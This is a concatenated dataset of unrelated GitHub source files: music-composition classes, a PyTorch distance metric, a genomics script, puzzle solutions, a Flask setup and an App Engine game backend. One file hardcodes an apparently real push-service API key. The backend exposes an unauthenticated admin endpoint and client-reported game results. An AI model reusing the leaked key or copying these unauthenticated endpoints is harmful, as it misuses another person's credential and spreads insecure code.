2))\n","repo_name":"vQuadX/face-recognition-server","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"41512538688","text":"# -*- encoding: utf-8 -*-\n\nimport abjad\nfrom calliope import bubbles\nfrom copper import machines\nfrom copper.machines.tools import IndexedData as ID, ID1 # just to avoid a lot of typing\nfrom copper.generations.gen_e import gen_e\nfrom copper import staves\n\nclass GenF(machines.RhythmsPulsed):\n time_signature = (4,4)\n metrical_durations = ID(default=((4,4),), limit=36)\n rehearsal_mark_number = 6\n rhythm_initial_silence = 27\n tempo_command = '\\\\note #\"2.\" #1 = \\\\note #\"1\" #1 (\\\\note #\"4\" #1 = 144)'\n start_bar_line = \"||\"\n respell = None\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n # self.respell_events(\"flats\", 1, 42)\n # self.respell_events(\"sharps\", 44)\n\nclass Drone0(GenF, machines.Drone0):\n rhythm_initial_silence=2\n\nclass Drone10(Drone0):\n # show_data_attr=\"original_depthwise_index\"\n rhythm_initial_silence=2\n rhythm_segments = (\n # NOTE... include others here?\n (1,1,1,1,),\n )\n rhythm_sequence = ID({\n # NOTE: could cycle through a few possibilities\n }, default=0, limit=36)\n pitch_sequence = ID(default=0, limit=34)\n \n def update_data(self, **kwargs):\n machines.ArrangeAttachments.update_data(self, **kwargs)\n if self.__class__.__name__ == \"Drone10\":\n self.tag_events(\"grey\", every_child=True)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line3(GenF, gen_e.Line4):\n # rhythm_reverse = list(gen_e.Line4.rhythm_reverse)\n # rhythm_reverse.remove(7)\n rhythm_initial_silence=23\n pitch_reverse = gen_e.Line4.pitch_reverse + (19,25)\n # show_data_type=machines.EventData\n pitch_displacement = machines.FifthDisplacement(\n up=( 6,7, 19,20, 22, 24, 26, 30, 58,76),\n down=(2,4, 8,9,12, 16, 18, 21, )\n ) +\\\n machines.OctaveDisplacement(\n up=(1,3,4,9, 12, 16, 21),\n down=(5,7, 11, 19, 22, 26)\n ) \n breaks = gen_e.Line4.breaks + ID({\n 1:5,\n 3:1,\n 10:-4,\n 11:0,\n 13:-1,\n 19:-2,\n 25:-1,\n 26:1,\n })\n rhythm_times = 3 # NOTE... 3rd time cuts off... maybe that's Ok\n rhythm_multipliers = gen_e.Line4.rhythm_multipliers\n rhythm_multipliers[18]=1\n clef=\"treble\"\n\nclass Line3Pulsed(Line3):\n rhythm_pulses = ID({}, default=0.5)\n # def update_data(self):\n # super().update_data()\n # if self.__class__.__name__ == \"Line3\": # this helps restrict tags to short score only\n # self.logical_ties[0].tag(\"\\clef treble\")\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line1(GenF, gen_e.Line1):\n pitch_displacement = gen_e.Line1.pitch_displacement.copy() # + Line3.pitch_displacement\n for i,p in Line3.pitch_displacement.non_default_items():\n for j in range(2):\n pitch_displacement[i + j*28] |= p\n pitch_displacement[38] = set((7,))\n pitch_displacement[40] = set()\n pitch_displacement[52] = set()\n pitch_displacement.flat(29)\n pitch_displacement[32] = set((-7,))\n pitch_displacement.flat(45)\n pitch_displacement[58] = set((12,))\n pitch_displacement.flat(111)\n # print(pitch_displacement)\n\n # show_data_type = machines.SegmentData\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1, limit=40)\n rhythm_multipliers.fillme(range(1,3),2)\n rhythm_multipliers.fillme(range(8,20),0.5)\n # print(rhythm_multipliers)\n rhythm_initial_silence = 32\n breaks = gen_e.Line1.breaks.copy()\n for i in breaks.keylist():\n breaks[i] = breaks[i] * 2 / 1.5\n breaks[6] = -3\n breaks[7] = -6\n breaks[10] = 2.5\n breaks[15] = 1.5\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n self.respell_events(\"flats\", 1, 18)\n self.respell_events(\"sharps\", 19)\n\n# -------------------------------------------------------------------------------------------------\nclass Line2(GenF, gen_e.Line2):\n clef = \"bass\"\n # rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1, limit=40)\n pitch_displacement_fifths = machines.FifthDisplacement(down=(0,))\n pitch_displacement_fifths.cycle_me(1, cycle=(1,-1,-1,1), times=36)\n pitch_displacement_fifths.down(12)\n pitch_displacement_fifths.up(34)\n pitch_displacement_fifths.flat(45,46,54,56,71,80,82,92,95,104,106,107,116,119,135)\n pitch_displacement_octaves = machines.OctaveDisplacement()\n pitch_displacement_octaves.cycle_me(1, cycle=(-1,1,0,-1,1,0), times=28)\n pitch_displacement_octaves.flat(13)\n pitch_displacement_octaves.flat(47)\n\n pitch_displacement = pitch_displacement_fifths + pitch_displacement_octaves\n\n # print(pitch_displacement)\n\n breaks = gen_e.Line1.breaks.copy()\n rhythm_initial_silence = 28\n for i in breaks.keylist():\n breaks[i] = breaks[i] * 2 / 1.5\n rhythm_multipliers = gen_e.Line2.rhythm_multipliers.copy()\n rhythm_multipliers.default = 1\n for i in rhythm_multipliers.keylist():\n print(i)\n rhythm_multipliers[i] = rhythm_multipliers[i] / 1.5\n\n # pitch_displacement = machines.FifthDisplacement()\n # for i,f in gen_e.Line2.pitch_displacement.non_default_items()[::2]:\n # pitch_displacement[i]=f\n\n # for i,p in Line3.pitch_displacement.non_default_items():\n # for j in range(2):\n # pitch_displacement[i + j*27] |= p\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line2:\n self.events[1].tag(\"\\clef bass\")\n self.respell_events(\"flats\", 1, 33)\n self.respell_events(\"sharps\", 34)\n\nclass Line2Pulsed(Line2):\n rhythm_pulses = ID({}, default=0.5)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line4(GenF, gen_e.Line3):\n # show_data_type=machines.SegmentData\n rhythm_initial_silence = 28\n pitch_displacement = gen_e.Line3.pitch_displacement +\\\n machines.FifthDisplacement(\n up= ( 16,17, 25, 26, 27, 31, 79),\n down= (1,4,7, 12, 14, 15, )) +\\\n machines.OctaveDisplacement(\n up= ( 4, 7, 19, ),\n down=(1, 17, 28, 56))\n pitch_reverse = gen_e.Line3.pitch_reverse + (3,)\n breaks = gen_e.Line3.breaks + {\n 2:-2,\n 4:-5,\n 10:4,\n }\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line4:\n self.events[1].tag(\"\\clef bass\")\n if self.__class__.__name__ == \"Line4\":\n self.tag_events(\"darkred\", every_child=True)\n\nclass Line4Pulsed(Line4):\n rhythm_pulses = ID({}, default=0.5)\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line5(GenF, gen_e.Line5):\n rhythm_initial_silence = 30\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers(default=1)\n for i,r in gen_e.Line5.rhythm_multipliers.non_default_items():\n rhythm_multipliers[i] = r * 2\n breaks = gen_e.Line5.breaks.copy()\n breaks[1] = -2\n pitch_displacement = gen_e.Line5.pitch_displacement +\\\n machines.FifthDisplacement(\n up = ( 3, 11,13,14,15,32,33,34,37,44),\n down=(2,5,6,7,9,10, 42),\n ) + \\\n machines.OctaveDisplacement(\n up=(7,9),\n down=(13,14, 32, 35),\n )\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__ is Line5:\n self.events[1].tag(\"\\clef bass\")\n\n# -------------------------------------------------------------------------------------------------\n\nclass Line6(GenF, gen_e.Line6):\n rhythm_initial_silence = 36\n # show_data_type = machines.SegmentData\n breaks = gen_e.Line6.breaks\n breaks[6] = 0.5\n breaks[19] = -4\n pitch_displacement = gen_e.Line6.pitch_displacement +\\\n machines.FifthDisplacement(\n up = ( 28,29,35,38),\n down=(1,3,7,12),\n ) + \\\n machines.OctaveDisplacement(\n up=(1,3,9,),\n down=( 29,47,)\n )\n # print(pitch_displacement)\n# -------------------------------------------------------------------------------------------------\n\nclass Line7(GenF, gen_e.Line6):\n # show_data_type = machines.SegmentData\n rhythm_initial_silence = 52\n breaks = ID()\n breaks.extend( [-3]*18 )\n breaks[10] = -3.5\n breaks[15] = -1\n rhythm_multipliers = machines.RhythmsMultiplied.make_multipliers({\n 5:0.5,\n 9:0.5,\n 14:0.5,\n 18:0.5,\n },default=0.25)\n rhythm_times = 2\n pitch_displacement = gen_e.Line6.pitch_displacement.copy()\n pitch_displacement.flat(38)\n pitch_displacement = pitch_displacement + \\\n machines.FifthDisplacement(\n up = ( 11,12,17, 32, 35, 37,38,41, 48),\n down=(0,1,2,3, 18, 36, 42,43),\n ) + \\\n machines.OctaveDisplacement(\n up=(1,2,3, 23, 36, ),\n down=(10, 19, 38),\n )\n # print(pitch_displacement)\n def update_data(self, **kwargs):\n super().update_data(**kwargs)\n if self.__class__.__name__ == \"Line7\":\n self.tag_events(\"magenta\", every_child=True)\n# -------------------------------------------------------------------------------------------------\n\nbubbles.illustrate_me(__file__, \n lambda: staves.CopperShortScore(\n bubbles.Bubble(\n drone0 = Drone0(show_data_attr=\"original_depthwise_index\"),\n drone10 = Drone10(show_data_attr=\"original_depthwise_index\"),\n line1 = Line1(show_data_attr=\"original_depthwise_index\"),\n line2 = Line2(show_data_attr=\"original_depthwise_index\"),\n # line3 = Line3(show_data_attr=\"original_depthwise_index\"),\n line3 = Line3Pulsed(show_data_attr=\"original_depthwise_index\"),\n line4 = Line4(show_data_attr=\"original_depthwise_index\", clef=\"bass\"),\n line5 = Line5(show_data_attr=\"original_depthwise_index\"),\n line6 = Line6(show_data_attr=\"original_depthwise_index\"),\n line7 = Line7(show_data_attr=\"original_depthwise_index\"),\n ),\n sequence = (\"line1\",\"line2\",\"line3\",\"line4\",\"line5\",\"line6\",\"line7\",\"drone0\",\"drone10\"),\n stylesheets = (\"../../scores/stylesheets/shortscore.ily\",)\n ).get_lilypond_file(),\n as_midi=True,\n )\n","repo_name":"mirrorecho/rwestmusic-copper","sub_path":"copper/generations/gen_f/gen_f.py","file_name":"gen_f.py","file_ext":"py","file_size_in_byte":10662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11480940152","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 21 09:57:18 2023\r\n\r\n@author: kisen\r\n\"\"\"\r\n\r\nimport torch\r\n\r\nclass distanceMetric():\r\n \r\n # Constructor to set the user-defined metric\r\n def __init__(self, distMetric, p=2.0):\r\n self.distMetric = distMetric\r\n \r\n if distMetric == \"p-norm\":\r\n self.distFunc = torch.nn.PairwiseDistance(p=p)\r\n \r\n elif distMetric == \"cosine\":\r\n self.distFunc = torch.nn.CosineSimilarity(dim=1)\r\n \r\n elif distMetric == \"absolute\":\r\n self.distFunc = torch.abs\r\n \r\n # Call-method to return the distance.\r\n def __call__(self, input1, input2):\r\n if self.distMetric == \"absolute\":\r\n return self.distFunc(input1 - input2)\r\n else:\r\n return self.distFunc(input1, input2)\r\n","repo_name":"kisen123/mastersthesis","sub_path":"mastersthesis/loss_module/distanceMetric.py","file_name":"distanceMetric.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13290812456","text":"import requests\nimport json\n\n\npush_base_url = \"https://sc.ftqq.com/\"\nsc_key = \"SCU63598T8dbcd2527aefac9c980e6625bd2e92235d99de5fb42e6\"\n\n\ndef push_message(text=\"Error\"):\n get_push_url = push_base_url + sc_key + \".send?\" + \"text=\" + str(text)\n requests.get(get_push_url)\n\n","repo_name":"Oumourin/Im-Fine-Thank-You","sub_path":"PushMessage.py","file_name":"PushMessage.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1304933728","text":"#!/usr/bin/python\n# Author: Mike Gloudemans\n# 7/18/2018\n\n# Write a genetic map file (showing recombination rates)\n# including every 1000 Genomes varaint.\n# Then bgzip and tabix it.\n\nimport gzip\nimport subprocess\n\n# Genetic map\nfor chrom in (range(1,23) + [\"X\"]):\n#for chrom in (range(7,23) + [\"X\"]):\n kg_file = \"/mnt/lab_data/montgomery/shared/1KG/ALL.chr{0}.phase3_shapeit2_mvncall_integrated_v5a.20130502.genotypes.vcf.gz\".format(chrom)\n\n filename = \"/mnt/lab_data/montgomery/nicolerg/genetic-map/genetic_map_GRCh37_chr{0}.txt\".format(chrom)\n output = \"/users/mgloud/projects/coloc_comparisons/data/genetic-map/extended_\" + filename.split(\"/\")[-1]\n\n last_pos = 0\n next_pos = 0\n last_map = 0\n next_map = 0\n\n with open(output, \"w\") as w:\n w.write(\"position COMBINED_rate(cM/Mb) Genetic_Map(cM)\\n\")\n with gzip.open(kg_file) as f1k:\n with open(filename) as f:\n f.readline()\n for kg_var in f1k:\n if kg_var.startswith(\"#\"):\n continue\n\n kg_var = int(kg_var.split()[1])\n if kg_var > next_pos:\n map_var = f.readline()\n if map_var == \"\":\n break\n map_var = map_var.strip().split()\n\n\n last_pos = next_pos\n next_pos = int(map_var[1])\n last_map = next_map\n next_map = float(map_var[3])\n current_rate = map_var[2]\n\n current_map = last_map + ((kg_var - last_pos) * 1.0 / (next_pos - last_pos)) * (next_map - last_map)\n\n w.write(\"{3}\\t{0}\\t{1}\\t{2}\\n\".format(kg_var, current_rate, current_map, chrom))\n\n subprocess.check_call(\"cat {0} | uniq | sort -k2,2n > {0}.sorted\".format(output), shell=True)\n subprocess.check_call(\"bgzip -f {0}.sorted\".format(output), shell=\"True\")\n subprocess.check_call(\"tabix -f -S 1 -s 1 -b 2 -e 2 \" + output + \".sorted.gz\", shell=True)\n\n\n","repo_name":"mikegloudemans/coloc_comparison","sub_path":"scripts/simulate_data/write_fine_recomb_maps.py","file_name":"write_fine_recomb_maps.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15591833076","text":"\"https://leetcode.com/problems/01-matrix/description/\"\nfrom collections import deque\nn= int(input())\na = []\nfor i in range(n):\n tmp = list(map(int, input().split()))\n a.append(tmp)\n\ndef solution_1(my_input):\n # Time complexiy\n num_row = len(my_input)\n num_col = len(my_input[0])\n # step 1: initilize data\n\n result = [[10000]*num_col for _ in range(num_row)]\n for i in range(num_row):\n for j in range(num_col): # big(0) : O(n^2*r^2)\n # so we will check per element in matrix to calculate the nearest distance\n if my_input[i][j]==0:\n result[i][j] = 0\n else:\n # we have to look up again every element to find the min distance\n for i1 in range(num_row):\n for j1 in range(num_col):\n if my_input[i1][j1] ==0 and (abs(i1-i) + abs(j1-j)) < result[i][j]:\n print(abs(i1-i) + abs(j1-j))\n result[i][j] = (abs(i1-i) + abs(j1-j))\n\n return result\n\ndef solution_with_bfs(matrix):\n # Using breath first search to search\n #create queue for using breath first search\n # firstly all zero is level 1 , 1 around 0 is level 2, 1 around 1 level 3\n searched_queue = deque()\n\n num_row = len(matrix)\n num_col = len(matrix[0])\n\n #first create result which store distance\n\n result = [[10000] * num_col for _ in range(num_row)]\n # so we have a new result matrix with 10000 default value\n # loop and edit result and add to the queue\n for i in range(num_row):\n for j in range(num_col):\n if (matrix[i][j] ==0):\n # if matrix[i][j] =0 we will set result =0 and add it like a node to queue\n result[i][j] = 0\n searched_queue.append([i,j])\n\n # make a queue just include cell which have value 0\n\n # [row,column] => [left, right, up, down]\n adjacent_list= [[0,1],[0,-1],[1,0],[-1,0]]\n # this case is a little different\n while searched_queue: # loop a queue\n # first we have to pop a cell\n cell = searched_queue.popleft() #pop cell\n current_row = cell[0]\n current_col = cell[1]\n # ok now we have to look up adjacent nodes (maybe this is 1 near it)\n # find to lookup 1 cell\n for i in adjacent_list:\n\n new_row = current_row + i[0]\n new_col = current_col + i[1]\n\n\n if (new_row >= 0 and new_col >= 0 and new_row < num_row and new_col < num_col):\n # ok this adjacent node is still in matrix\n\n if (result[new_row][new_col] > (result[current_row][current_col])):\n #\n #ok we found cell 1,please calculate and update it\n # if 0 found 1 => this 1 => will get distance (0+1)\n # if 1 find 1 => this 1 => will get current_distance +1, if any zero\n result[new_row][new_col] = (result[current_row][current_col] + 1)\n # after that we add \"1\" to verify if we found any \"1\" near it\n searched_queue.append([new_row,new_col])\n return result\nprint(solution_with_bfs(a))","repo_name":"huyngopt1994/python-Algorithm","sub_path":"leet-code/matrix/01_matrix.py","file_name":"01_matrix.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"31322762196","text":"\ndef get_opcode(inst):\n s = str(inst)\n if len(s) == 1:\n return int(s)\n\n if (len(s) == 2 and s[0] == 0):\n return int(s[1])\n \n return int(s[len(s) - 1:len(s)])\n\ndef get_opmodes(s):\n t = str(s)\n if len(t) <= 2:\n return [0]\n\n ret = []\n for c in t[:2]:\n ret.append(int(c))\n return ret\n\ndef get_value(mode, arr, i):\n if mode == 1:\n return int(arr[i])\n if mode == 0:\n #print(\"INDEX: \" + str(i) + \" POINTS TO: \" + str(arr[i]) + \" WHICH IS REALLY: \" + str(arr[arr[i]]))\n return int(arr[arr[i]])\n\ndef process_opcode(arr, i):\n if i > len(arr) or i < 0 or arr[i] == 99:\n return -1\n\n op_code = get_opcode(arr[i])\n op_mode = get_opmodes(arr[i])\n while len(op_mode) < 2:\n op_mode.insert(0, 0)\n\n print(\"index \" + str(i) + \" inst: \" + str(arr[i]) + \" = \" + str(op_code) + \" \" + str(op_mode))\n #if i == :\n # print(str(arr))\n # print(str(arr[i]))\n # print(str(arr[i+1]))\n # print(str(arr[i+2]))\n # print(str(arr[i+3]))\n if op_code == 1 or op_code == 2:\n C = get_value(op_mode[1], arr, i + 1)\n B = get_value(op_mode[0], arr, i + 2)\n #print(\"C: \" + str(C) + \" B: \" + str(B))\n if op_code == 1:\n arr[arr[i + 3]] = C + B\n return 4\n elif op_code == 2:\n arr[arr[i + 3]] = C * B\n return 4\n elif op_code == 3:\n arr[arr[i + 1]] = input(\"enter code\")\n return 2\n elif op_code == 4:\n print(get_value(op_mode[0], arr, i + 1))\n return 2\n else:\n return -1\n\n\ndef ans_5A():\n f = open(\"data/5.txt\")\n for d in f:\n arr = [int(x) for x in d.split(\",\")]\n\n keep_running = 0\n i = 0\n while keep_running != -1:\n keep_running = process_opcode(arr, i)\n i += keep_running\n\nans_5A()","repo_name":"EasyCodes/advent","sub_path":"advent_5.py","file_name":"advent_5.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31952606801","text":"from flask import Flask\nfrom flask_smorest import Api\nfrom flask_cors import CORS\nfrom resources.mail_chimp import blp as MailchimpBlueprint\nfrom resources.google_analytics import blp as GoogleAnalyticsBlueprint\n\napp = Flask(__name__)\napp.config[\"API_TITLE\"] = \"REST API\"\napp.config[\"API_VERSION\"] = \"v1\"\napp.config[\"OPENAPI_VERSION\"] = \"3.0.3\"\napp.config[\"OPENAPI_URL_PREFIX\"] = \"/\"\napp.config[\"OPENAPI_SWAGGER_UI_PATH\"] = \"/docs\"\napp.config[\"OPENAPI_SWAGGER_UI_URL\"] = \"https://cdn.jsdelivr.net/npm/swagger-ui-dist/\"\napp.config[\"PROPAGATE_EXCEPTIONS\"] = True\nCORS(app)\napi = Api(app)\n\n\napi.register_blueprint(MailchimpBlueprint)\napi.register_blueprint(GoogleAnalyticsBlueprint)\n","repo_name":"digital-industry-group/Capstone2022","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7515950091","text":"data = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]\n\n\ndef removeDuplicates(nums):\n length = len(nums)\n nums.sort()\n index = 1\n # 通过正向遍历删除元素\n while index < length:\n if nums[index] == nums[index - 1]:\n nums.remove(nums[index - 1])\n length -= 1\n continue\n index += 1\n return len(nums)\n\n\ndef removeDuplicates1(nums):\n # 可以通过反向遍历的方法删除元素\n for num_index in range(len(nums) - 1, 0, -1): # python的反向遍历\n if nums[num_index] == nums[num_index - 1]:\n nums.pop(num_index)\n return len(nums)\n\n\ndef removeDuplicates2(nums):\n # 通过双指针法去重,效率高,方法妙\n nums.sort()\n i = 0\n for j in range(1, len(nums)):\n if nums[i] != nums[j]:\n i += 1\n nums[i] = nums[j]\n return i + 1\n\n\nprint(removeDuplicates1(data))\n\nprint(data)\n","repo_name":"letwant/leetcode","sub_path":"26 删除排序数组中的重复项/removeDuplicates.py","file_name":"removeDuplicates.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38880847015","text":"import logging\nimport os;\nimport time, datetime, math;\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext import db\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext.webapp import util\nfrom google.appengine.api import memcache\nfrom dbs import FBUsers, Games\nimport opensns\n\n# multilingual settings\nfrom django.conf import settings\nsettings._target = None\nos.environ['DJANGO_SETTINGS_MODULE'] = 'conf.settings'\nfrom django.utils import translation\nfrom django.utils import simplejson\nimport sys, urllib, logging\n\nkeyRecent = 'recentGames'\n\ndef getLevelText(lvl):\n txt = \"lvl \" + str(lvl)\n return txt\n\ndef getLevelScore(lvl):\n fen = int(math.pow(2, lvl+1))\n return fen\n\ndef setHandlerLocale(handle, lang):\n os.environ['DJANGO_SETTINGS_MODULE'] = 'conf.settings'\n translation.activate(lang)\n lang = translation.get_language()\n handle.request.LANGUAGE_CODE = lang\n return lang\n\ndef getUserObject(objId):\n LIM = datetime.timedelta(days=3)\n cnt = 0\n user = None\n while user is None and cnt < 3:\n try :\n user = db.GqlQuery(\"SELECT * FROM FBUsers WHERE uid = :1\", str(objId)).get();\n except :\n user = None\n cnt = cnt + 1\n\n if user :\n if user.era > datetime.datetime.today() - LIM and user.name:\n return user\n else :\n user = FBUsers(uid=str(objId));\n\n # whether we can fetch a user's new info\n if opensns.sns :\n info = opensns.sns.getUserInfo(objId)\n user.src = opensns.sns.src\n user.name = info['name']\n user.icon = info['pic_square']\n user.era = datetime.datetime.today()\n user.put()\n return user\n\nclass GameInfo():\n name = ''\n icon = ''\n url = ''\n res = ''\n tim = ''\n tms = 0 \n src = 'FB'\n lvl = 0\n\ndef formatGame(g, u=None):\n ret = GameInfo()\n if not u:\n u = getUserObject(g.uid)\n ret.url = u.getProfileUrl()\n ret.tim = \"%02d:%02d:%02d\"%(g.tms.hour, g.tms.minute, g.tms.second);\n ret.tms = g.tms\n ret.res = g.res\n ret.lvl = getLevelText(g.lvl)\n ret.name = u.name\n ret.icon = u.icon\n ret.src = u.src\n return ret\n\ndef checkUpgrade(u, v):\n k = \"score_\" + str(u.uid)\n fen = memcache.get(key=k)\n if fen is None:\n fen = 0\n if v == 0 :\n fen = 0\n else : \n fen = fen + v\n\n if fen >= 3 and u.lvl < 10:\n u.lvl = u.lvl + 1\n fen = 0\n memcache.set(key=k, value=fen, time=3600*6) # expire in 6 hours\n return\n\ndef updateCache(g, u):\n try :\n g = formatGame(g, u)\n games = memcache.get(key=keyRecent)\n if not games:\n games = []\n games.insert(0, g)\n del games[12:] ### at most 12 recent games\n memcache.set(key=keyRecent, value=games, time=3600*24*3) # expire in 3 days\n except :\n pass\n return\n\nclass AdminHandler(webapp.RequestHandler):\n def get(self):\n uid = self.request.get('uid', default_value='0')\n src = self.request.get('src', default_value=None)\n cmd = self.request.get('cmd', default_value=None)\n if cmd != 'chsrc' or src is None:\n a = _('FB')\n b = _('XN')\n b = _('51')\n return\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n try :\n user = db.GqlQuery(\"SELECT * FROM FBUsers WHERE uid = :1\", uid).get();\n user.src = src\n user.put()\n self.response.out.write('OK')\n except :\n self.response.out.write('FAIL')\n return\n\nclass PhoneRegHandler(webapp.RequestHandler):\n def get(self):\n self.post();\n\n def post(self):\n uid = self.request.get('phone_user', default_value='0')\n opensns.init_sns(self)\n logging.info(\"user id is \" + uid)\n user = getUserObject(uid);\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n self.response.out.write('OK');\n logging.info(user.name)\n return\n\nclass PhoneRecentHandler(webapp.RequestHandler):\n def post(self):\n self.get()\n\n def get(self):\n opensns.init_sns(self)\n lang = self.request.get('phone_locale', default_value='en')\n lang = setHandlerLocale(self, lang)\n\n games = memcache.get(key=keyRecent)\n if not games:\n games = []\n for g in games:\n g.src = _(g.src)\n g.lvl = _(g.lvl)\n g.res = _(g.res)\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'games': games,\n }\n\n self.response.headers['Content-Type'] = 'text/xml; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/recentgames.xml')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass CellPhoneHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/cellphone.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass HelpHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/help.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass RankHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n rev = int(self.request.get('rev', default_value='0'))\n lvl = int(self.request.get('lvl', default_value='10'))\n if rev == 1:\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE lvl=:1 ORDER BY score\", lvl).fetch(40);\n else :\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE lvl=:1 ORDER BY score DESC, win DESC\", lvl).fetch(40);\n\n rev = 1 - rev\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n lvls = [ _(\"lvl \" + str(i)) for i in range(10, -1, -1)]\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'users': users,\n 'lvls': lvls,\n 'lvl': lvl,\n 'rev': rev,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/rank.html')\n self.response.out.write(template.render(path, template_values))\n pass\n\nclass RecentGamesHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n\n games = memcache.get(key=keyRecent)\n if not games:\n games = []\n for g in games:\n g.src = _(g.src)\n g.lvl = _(g.lvl)\n g.res = _(g.res.capitalize())\n\n template_values = {\n 'sns' : opensns.sns,\n 'lang' : lang,\n 'games': games,\n }\n\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/recentgames.html')\n self.response.out.write(template.render(path, template_values))\n return\n\nclass CleanGamesHandler(webapp.RequestHandler):\n def get(self):\n # make this to clean users.\n day = int(self.request.get('day', default_value='30'))\n tms = datetime.datetime.today() - datetime.timedelta(days=day)\n users = db.GqlQuery(\"SELECT * FROM FBUsers WHERE era < :1 LIMIT 10\", tms);\n if users :\n for u in users :\n u.lvl = u.lvl - 1\n if u.lvl < 0:\n logging.info(\"delete user id: %s \" % u.uid );\n db.delete(u)\n else :\n logging.info(\"downgrade user id: %s \" % u.uid );\n u.era = datetime.datetime.today()\n u.put()\n pass;\n\nclass StartHandler(webapp.RequestHandler):\n def get(self):\n uid = self.request.get('uid');\n lvl = int(self.request.get('lvl', default_value='0'))\n if lvl >= 10:\n lvl = 9\n user = getUserObject(uid);\n\n gid = str(int(time.time()))\n newgame = Games(gid=gid, uid=uid, lvl=lvl)\n newgame.res = 'Start'\n newgame.tms = datetime.datetime.today()\n user.score = user.score - getLevelScore(newgame.lvl)\n user.lose = user.lose + 1\n updateCache(newgame, user)\n checkUpgrade(user, -1)\n user.put()\n self.response.out.write(gid);\n pass;\n\nclass ResultHandler(webapp.RequestHandler):\n def get(self):\n uid = self.request.get('uid');\n act = self.request.get('action');\n lvl = int(self.request.get('lvl', default_value='0'))\n if lvl >= 10:\n lvl = 9\n gid = str(int(time.time()))\n newgame = Games(gid=gid, uid=uid, lvl=lvl)\n\n fen = getLevelScore(lvl)\n user = getUserObject(uid);\n val = 0\n if act == 'win' :\n user.win = user.win + 1\n user.lose = user.lose - 1\n user.score = user.score + fen*2\n val = 2\n elif act == 'lose':\n val = 0\n else:\n user.draw = user.draw + 1\n user.lose = user.lose - 1\n user.score = user.score + fen*3/2\n val = 1 \n\n if lvl >= user.lvl:\n checkUpgrade(user, val)\n\n newgame.res = act.capitalize()\n newgame.tms = datetime.datetime.today()\n\n updateCache(newgame, user)\n user.put() \n\nclass InviteHandler(webapp.RequestHandler):\n def post(self):\n opensns.init_sns(self)\n lang = opensns.sns.lang\n lang = setHandlerLocale(self, lang)\n\n template_values = {\n };\n self.response.headers['Content-Type'] = 'text/html; charset=utf-8'\n path = os.path.join(os.path.dirname(__file__), 'template/invite_fb.html')\n self.response.out.write(template.render(path, template_values))\n\nclass MainHandler(webapp.RequestHandler):\n def get(self):\n opensns.init_sns(self)\n\n sns_uid = opensns.sns.uid\n if int(sns_uid) == 0 :\n self.ask_auth(opensns.sns.auth_url)\n return\n\n lang = opensns.sns.lang\n setHandlerLocale(self, lang)\n user = getUserObject(sns_uid)\n 